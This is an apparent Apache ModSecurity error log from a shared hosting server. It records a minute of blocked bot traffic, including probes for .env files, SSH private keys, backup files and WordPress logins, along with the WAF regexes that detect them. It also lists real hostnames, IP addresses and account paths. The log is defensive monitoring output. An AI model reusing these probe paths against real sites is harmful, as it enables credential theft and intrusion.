[Tue May 26 14:52:55.266139 2026] [security2:error] [pid 658374:tid 658553] [client 138.229.103.255:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVmb51Mb7_aby-E0KcmbwAAADE"], referer: https://www.anujtradingco.com/
[Tue May 26 14:52:55.952518 2026] [security2:error] [pid 658374:tid 658563] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmb51Mb7_aby-E0KcmfwAAADs"]
[Tue May 26 14:52:57.105680 2026] [security2:error] [pid 658374:tid 658624] [client 138.229.103.255:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVmcZ1Mb7_aby-E0KcmqQAAAHg"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1467557&moderation-hash=40b05860cbdd81bd5ae1c154b8d08af4
[Tue May 26 14:52:57.906359 2026] [autoindex:error] [pid 658374:tid 658510] [client 137.184.81.51:0] AH01276: Cannot serve directory /home2/debatqhn/crusties.agsnails.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:52:57.939720 2026] [security2:error] [pid 658374:tid 658523] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmcZ1Mb7_aby-E0KcmtgAAABM"]
[Tue May 26 14:52:58.062075 2026] [autoindex:error] [pid 658374:tid 658525] [client 137.184.81.51:0] AH01276: Cannot serve directory /home2/debatqhn/crusties.agsnails.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:52:58.203226 2026] [security2:error] [pid 658374:tid 658462] [remote 85.215.36.85:45274] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 85.36.215.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahVmcp1Mb7_aby-E0KcmyQAAF1c"]
[Tue May 26 14:53:00.100177 2026] [security2:error] [pid 658374:tid 658595] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmc51Mb7_aby-E0KcnDQAAAFs"]
[Tue May 26 14:53:02.520894 2026] [security2:error] [pid 658374:tid 658573] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmdp1Mb7_aby-E0KcnVgAAAEU"]
[Tue May 26 14:53:04.687838 2026] [security2:error] [pid 658374:tid 658524] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmeJ1Mb7_aby-E0KcnjQAAABQ"]
[Tue May 26 14:53:05.813811 2026] [security2:error] [pid 658374:tid 658600] [client 114.119.129.113:39215] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "moes-art.com"] [uri "/blog/influencer-marketing-simplified"] [unique_id "ahVmeZ1Mb7_aby-E0KcnwQAAAGA"], referer: http://moes-art.com/blog/page/2
[Tue May 26 14:53:06.395876 2026] [security2:error] [pid 658374:tid 658562] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmeZ1Mb7_aby-E0KcnyQAAADo"]
[Tue May 26 14:53:07.980296 2026] [security2:error] [pid 658374:tid 658546] [client 88.13.236.152:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVme51Mb7_aby-E0KcoCQAAACo"]
[Tue May 26 14:53:09.266004 2026] [security2:error] [pid 658374:tid 658628] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmfJ1Mb7_aby-E0KcoMwAAAHw"]
[Tue May 26 14:53:09.441009 2026] [security2:error] [pid 658374:tid 658430] [remote 178.104.90.233:53622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.90.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVmfZ1Mb7_aby-E0KcoRwAAGzc"]
[Tue May 26 14:53:09.767097 2026] [security2:error] [pid 658374:tid 658524] [client 114.119.150.166:31677] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/"] [unique_id "ahVmfZ1Mb7_aby-E0KcoXAAAABQ"], referer: https://glorodavionics.com?route=product/product&path=72_79_130&product_id=176
[Tue May 26 14:53:10.171319 2026] [security2:error] [pid 658374:tid 658379] [remote 74.7.241.58:54584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVmfp1Mb7_aby-E0KcoaQAAAwQ"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/ja
[Tue May 26 14:53:11.092089 2026] [security2:error] [pid 658374:tid 658530] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmfp1Mb7_aby-E0KcohAAAABo"]
[Tue May 26 14:53:12.560986 2026] [security2:error] [pid 658374:tid 658524] [client 85.121.127.3:40438] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "taotechservices.com"] [uri "/app/.env"] [unique_id "ahVmgJ1Mb7_aby-E0KcozwAAABQ"]
[Tue May 26 14:53:12.561928 2026] [security2:error] [pid 658374:tid 658607] [client 85.121.127.3:40318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "taotechservices.com"] [uri "/backend/.env"] [unique_id "ahVmgJ1Mb7_aby-E0Kco0QAAAGc"]
[Tue May 26 14:53:12.562183 2026] [security2:error] [pid 658374:tid 658573] [client 85.121.127.3:40432] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "taotechservices.com"] [uri "/api/.env"] [unique_id "ahVmgJ1Mb7_aby-E0Kco0AAAAEU"]
[Tue May 26 14:53:12.565196 2026] [security2:error] [pid 658374:tid 658601] [client 85.121.127.3:40424] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "taotechservices.com"] [uri "/.env.old"] [unique_id "ahVmgJ1Mb7_aby-E0Kco3wAAAGE"]
[Tue May 26 14:53:12.565439 2026] [security2:error] [pid 658374:tid 658584] [client 85.121.127.3:40442] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "taotechservices.com"] [uri "/.ssh/id_rsa"] [unique_id "ahVmgJ1Mb7_aby-E0KcoxwAAAFA"]
[Tue May 26 14:53:12.565614 2026] [security2:error] [pid 658374:tid 658556] [client 85.121.127.3:40422] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "taotechservices.com"] [uri "/.env.bak"] [unique_id "ahVmgJ1Mb7_aby-E0Kco3QAAADQ"]
[Tue May 26 14:53:12.566606 2026] [security2:error] [pid 658374:tid 658576] [client 85.121.127.3:40440] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "taotechservices.com"] [uri "/public/.env"] [unique_id "ahVmgJ1Mb7_aby-E0Kco5QAAAEg"]
[Tue May 26 14:53:12.567015 2026] [security2:error] [pid 658374:tid 658549] [client 85.121.127.3:40410] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "taotechservices.com"] [uri "/.env"] [unique_id "ahVmgJ1Mb7_aby-E0Kco3gAAAC0"]
[Tue May 26 14:53:12.568688 2026] [security2:error] [pid 658374:tid 658552] [client 85.121.127.3:40446] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "taotechservices.com"] [uri "/.ssh/id_dsa"] [unique_id "ahVmgJ1Mb7_aby-E0Kco5wAAADA"]
[Tue May 26 14:53:12.574302 2026] [security2:error] [pid 658374:tid 658580] [client 85.121.127.3:40420] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "taotechservices.com"] [uri "/.env.backup"] [unique_id "ahVmgJ1Mb7_aby-E0Kco0wAAAEw"]
[Tue May 26 14:53:12.958379 2026] [http2:info] [pid 662057:tid 662057] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 14:53:14.651011 2026] [security2:error] [pid 662057:tid 662187] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmgPT3lMm9tGFVg9RIWQAAAQo"]
[Tue May 26 14:53:16.085276 2026] [security2:error] [pid 658374:tid 658593] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmg51Mb7_aby-E0KcpYgAAAFk"]
[Tue May 26 14:53:16.156563 2026] [security2:error] [pid 658374:tid 658391] [remote 178.104.90.233:46940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.90.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahVmhJ1Mb7_aby-E0KcpbQAAHxA"]
[Tue May 26 14:53:18.405009 2026] [security2:error] [pid 658374:tid 658543] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmhZ1Mb7_aby-E0KcppQAAACc"]
[Tue May 26 14:53:20.465489 2026] [security2:error] [pid 658374:tid 658584] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmiJ1Mb7_aby-E0Kcp_gAAAFA"]
[Tue May 26 14:53:22.320859 2026] [security2:error] [pid 658374:tid 658592] [client 173.239.254.131:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVmh51Mb7_aby-E0Kcp4wAAWD8"]
[Tue May 26 14:53:22.321188 2026] [security2:error] [pid 658374:tid 658624] [client 185.191.171.16:62434] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahVmip1Mb7_aby-E0KcqNwAAAHg"]
[Tue May 26 14:53:22.321333 2026] [security2:error] [pid 658374:tid 658624] [client 185.191.171.16:62434] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahVmip1Mb7_aby-E0KcqNwAAAHg"]
[Tue May 26 14:53:22.870648 2026] [security2:error] [pid 662057:tid 662241] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmivT3lMm9tGFVg9RIwgAAAUA"]
[Tue May 26 14:53:23.298083 2026] [core:error] [pid 658374:tid 658583] [client 5.255.231.66:40382] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:53:23.298114 2026] [core:error] [pid 658374:tid 658583] [client 5.255.231.66:40382] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:53:24.869574 2026] [security2:error] [pid 662057:tid 662195] [client 20.12.194.227:28766] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.jiyani.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVmjPT3lMm9tGFVg9RI9AAAARI"]
[Tue May 26 14:53:24.869699 2026] [security2:error] [pid 662057:tid 662195] [client 20.12.194.227:28766] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webdisk.jiyani.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVmjPT3lMm9tGFVg9RI9AAAARI"]
[Tue May 26 14:53:24.962154 2026] [security2:error] [pid 658374:tid 658521] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmjJ1Mb7_aby-E0KcqYAAAABE"]
[Tue May 26 14:53:24.998391 2026] [security2:error] [pid 662057:tid 662243] [client 20.12.194.227:13666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.jiyani.in"] [uri "/about.php"] [unique_id "ahVmjPT3lMm9tGFVg9RI9QAAAUI"]
[Tue May 26 14:53:24.998504 2026] [security2:error] [pid 662057:tid 662243] [client 20.12.194.227:13666] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webdisk.jiyani.in"] [uri "/about.php"] [unique_id "ahVmjPT3lMm9tGFVg9RI9QAAAUI"]
[Tue May 26 14:53:25.545668 2026] [security2:error] [pid 662057:tid 662259] [client 74.249.173.207:4825] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.eco-green.com.mx"] [uri "/wk/index.php"] [unique_id "ahVmjfT3lMm9tGFVg9RJAQAAAVI"]
[Tue May 26 14:53:27.112154 2026] [autoindex:error] [pid 658374:tid 658589] [client 45.148.10.204:34814] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:53:27.480743 2026] [security2:error] [pid 658374:tid 658546] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmj51Mb7_aby-E0KcqkAAAACo"]
[Tue May 26 14:53:27.614603 2026] [security2:error] [pid 658374:tid 658612] [client 213.209.159.175:56884] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/.env"] [unique_id "ahVmj51Mb7_aby-E0KcqnAAAAGw"]
[Tue May 26 14:53:27.812903 2026] [security2:error] [pid 662057:tid 662255] [client 74.249.173.207:4814] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.eco-green.com.mx"] [uri "/inputs.php"] [unique_id "ahVmj_T3lMm9tGFVg9RJFAAAAU4"]
[Tue May 26 14:53:28.057354 2026] [security2:error] [pid 662057:tid 662291] [client 213.209.159.175:56888] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/api/.env"] [unique_id "ahVmkPT3lMm9tGFVg9RJFQAAAXI"]
[Tue May 26 14:53:28.515265 2026] [security2:error] [pid 658374:tid 658571] [client 213.209.159.175:56890] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/backend/.env"] [unique_id "ahVmkJ1Mb7_aby-E0KcqsQAAAEM"]
[Tue May 26 14:53:28.529843 2026] [security2:error] [pid 658374:tid 658529] [client 14.179.170.98:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmkJ1Mb7_aby-E0KcqqQAAABk"]
[Tue May 26 14:53:29.033133 2026] [security2:error] [pid 658374:tid 658540] [client 213.209.159.175:56892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.159.209.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "162.215.241.212"] [uri "/phpinfo.php"] [unique_id "ahVmkJ1Mb7_aby-E0KcquQAAACQ"]
[Tue May 26 14:53:29.271582 2026] [security2:error] [pid 662057:tid 662310] [client 74.249.173.207:4806] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.eco-green.com.mx"] [uri "/ioxi-o.php"] [unique_id "ahVmkfT3lMm9tGFVg9RJIgAAAYU"]
[Tue May 26 14:53:29.673195 2026] [security2:error] [pid 658374:tid 658548] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmkZ1Mb7_aby-E0KcqvQAAACw"]
[Tue May 26 14:53:31.183616 2026] [security2:error] [pid 658374:tid 658581] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmkp1Mb7_aby-E0Kcq1AAAAE0"]
